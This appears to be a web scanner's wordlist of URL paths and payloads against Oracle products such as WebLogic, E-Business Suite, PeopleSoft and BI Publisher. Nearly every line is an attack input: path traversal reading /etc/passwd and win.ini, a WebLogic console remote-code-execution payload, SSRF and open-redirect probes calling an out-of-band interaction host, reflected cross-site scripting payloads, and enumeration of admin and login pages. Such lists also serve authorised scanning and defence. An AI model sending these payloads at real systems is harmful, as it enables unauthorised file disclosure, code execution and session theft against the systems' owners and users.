/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(
/console/login/LoginForm.jsp
/manage/fileDownloader?sec=1
/oam/server/opensso/sessionservice
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/resource/file%3a///etc/passwd/
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/RP?wsrp-url=file:///etc/passwd
/RP?wsrp-url=file:///c:\\windows\\win.ini
/psc/ps/?&cmd=login&languageCd=ENG
/psp/csperf/?&cmd=login&languageCd=ENG
/psp/FMPRD/?&cmd=login&languageCd=ENG
/psp/csprd/?&cmd=login&languageCd=ENG
/psp/hcmprdfp/?&cmd=login&languageCd=ENG
/psp/HRPRODASP/?&cmd=login&languageCd=ENG
/psp/guest/?&cmd=login&languageCd=ENG
/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG
/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG
/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG
/psp/applyuth/?&cmd=login&languageCd=ENG
/psp/HRPRD/?&cmd=login&languageCd=ENG
/psp/CAREERS/?&cmd=login&languageCd=ENG
/psp/heprod_5/?&cmd=login&languageCd=ENG
/psp/saprod/?&cmd=login&languageCd=ENG
/psp/hr857prd_er/?&cmd=login&languageCd=ENG
/psp/CHUMPRDM/?&cmd=login&languageCd=ENG
/psp/HR92PRD/?&cmd=login&languageCd=ENG
/psp/cangate_1/?&cmd=login&languageCd=ENG
/psp/ihprd/?&cmd=login&languageCd=ENG
/OA_HTML/jtfwrepo.xml
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/oam/pages/login.jsp
/em/console/ias/oc4j/home
/atg/bcc
/atg/user/html/login.jsp
/saw.dll?bieehome&startPage=1
/analytics/saw.dll?Dashboard
/OA_HTML/AppsLogin
/em/console/logon/logon
/iPages/i_login.asp

/OperaLogin/Welcome.do
/{{path}}
/uddiexplorer/
/cgi-bin/test-cgi
/fcgi-bin/echo
/reports/
/ora/reports/
/oracle/reports/
/oamfed/idp/soap
/dbaas_monitor/login
/welcome_webcenter.html
/log4j.properties
/reports/rwservlet/showenv
/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
{{paths}}
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}
/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/OA_HTML/lcmServiceController.jsp
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/cgi-bin/printenv
/OA_HTML/bin/sqlnet.log
/html/bin/sqlnet.log
/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert(
/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert(
/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert(
